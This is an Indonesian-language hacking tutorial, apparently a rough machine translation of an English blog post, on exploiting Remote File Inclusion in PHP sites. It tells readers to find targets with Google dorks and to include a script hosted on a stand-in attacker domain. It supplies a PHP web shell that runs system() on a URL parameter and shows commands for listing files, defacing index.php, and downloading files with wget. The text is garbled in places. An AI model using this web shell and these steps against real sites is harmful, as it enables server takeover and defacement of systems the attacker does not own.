Remote File Inclusion (RFI)

RFI adalah singkatan dari Remote File Inklusi, dan memungkinkan penyerang untuk mengupload kode kustom / file berbahaya di situs Web atau server dengan menggunakan script. Sebuah kerentanan theprohack.comThe tutorial sederhana untuk Remote File Inclusion (RFI) – memanfaatkan cek validasi miskin di website dan akhirnya dapat menyebabkan eksekusi kode pada server atau kode eksekusi di website (serangan XSS menggunakan javascript). Kali ini, saya akan menulis tutorial sederhana pada Remote File Inklusi dan pada akhir tutorial, saya rasa Anda akan tahu apa itu adalah tentang bagaimana dan mungkin dapat menyebarkan serangan atau dua.

RFI adalah kerentanan umum, dan percayalah semua situs hacking tidak tepat tentang injeksi SQL. Menggunakan RFI Anda benar-benar bisa mendeface situs web, mendapatkan akses ke server dan melakukan hampir semua hal (termasuk tersedak mereka keluar atau minta .. baik itu berlebihan tapi aku rasa Anda mendapatkan ide: P). Apa yang membuat lebih berbahaya adalah bahwa Anda hanya perlu memiliki akal sehat dan pengetahuan dasar tentang PHP untuk menjalankan salah satu ini, beberapa BASH mungkin akan berguna karena sebagian besar saat ini adalah host server di Linux..

Oke .. Mari kita mulai .. Langkah pertama adalah menemukan situs yang rentan .. Anda dapat dengan mudah menemukan mereka menggunakan Google dorks .. Jika anda tidak mempunyai ide, Anda mungkin ingin membaca sandi tentang lanjutan dorks hacking menggunakan Google atau menggunakan alat otomatis untuk menerapkan dorks Google menggunakan Google. Sekarang mari kita asumsikan kita telah menemukan sebuah website yang rentan

http://example-saja.com/index.php?page=home

Seperti yang Anda lihat, situs ini menarik dokumen yang tersimpan dalam format teks dari server dan membuat mereka sebagai halaman web. Kita bisa menemukan cara-cara di sekitarnya karena menggunakan fungsi include PHP untuk menarik mereka keluar .. check it out.

http://example-saja.com/index.php?page=http://hackersite.com/evilscript.txt

Saya telah menyertakan script khusus “eveilscript” dalam format teks dari website saya, yang berisi beberapa kode .. Sekarang .. jika sebuah situs web yang rentan, lalu 3 kasus terjadi –

* Kasus 1 – Anda mungkin telah memperhatikan bahwa url terdiri dari “” halaman = rumah “memiliki ekstensi, tapi aku telah menyertakan ekstensi di url saya, maka situs akan memberikan error seperti” kegagalan untuk memasukkan evilscript.txt.txt “, ini mungkin terjadi sebagai situs dapat secara otomatis menambahkan ekstensi txt. ke halaman yang disimpan dalam server.
* Kasus 2 – Dalam kasus ini, secara otomatis menambahkan sesuatu di baris. Php maka kita harus menggunakan null byte “% 00” untuk menghindari kesalahan.
* Kasus 3 – eksekusi sukses:)

Sekarang setelah Anda telah berjuang sekitar satu ini, Anda mungkin ingin belajar apa yang harus kode dalam script. Anda dapat mendapatkan kode script custom terkenal C99 (terlalu bloaty tetapi sangat efektif sekali digunakan) atau Anda mungkin kode sendiri yang baru. Untuk pengetahuan tentang PHP mungkin akan berguna. Kita mulai

<?php

echo “<script>alert(U 4r3 0wn3d !!);</script>”;
echo “Run command: “.htmlspecialchars($_GET[‘cmd’]);

system($_GET[‘cmd’]);

Kode di atas memungkinkan Anda untuk mengeksploitasi menyertakan fungsi dan tes jika situs jika RFI (XSS) rentan dengan menjalankan kode kotak waspada dan jika berhasil, Anda dapat mengirim perintah khusus ke server linux di bash. Jadi … Jika Anda sedang beruntung dan jika bekerja, mari kita coba tangan kami pada beberapa perintah Linux. Sebagai contoh untuk menemukan direktori kerja saat ini dari server dan kemudian ke file daftar, kita akan menggunakan “pwd” dan “ls” perintah.

http//example-saja.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript

http//example-saja.com/index.php?cmd=ls&page=http://hackersite.com/ourscript

Apakah ia adalah bahwa ia mengirimkan perintah sebagai cmd kita masukkan ke dalam script kami, dan mulai mencetak daftar direktori kerja dan dokumen .. Bahkan lebih baik .. Anda hampir dapat membuat halaman menyatakan bahwa Anda hacked dengan menggunakan “echo” perintah

cmd=echo U r pwn3d by xero> index.php

menulis index.php dan membuat itu .. Dalam kasus ini, sebuah situs primitif nya yang menyimpan halaman dengan. Ekstensi txt, Anda mungkin ingin menempatkan dengan sepanjang files.Now txt. .. Seperti yang diharapkan .. Kami sekarang alpha dan omega dari website:) kita dapat men-download, menghapus, mengubah nama, apa saja! Ingin men-download stuff? coba “wget” fungsi (cmd = wget .. mendapatkan ide ..).. Ingin memindahkannya keluar? “Mv” ..

Aku meninggalkan sisanya pada kreativitas Anda ..

JusT share Bro,,,, jangan disalah gunakan…..okeeh/.///




Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: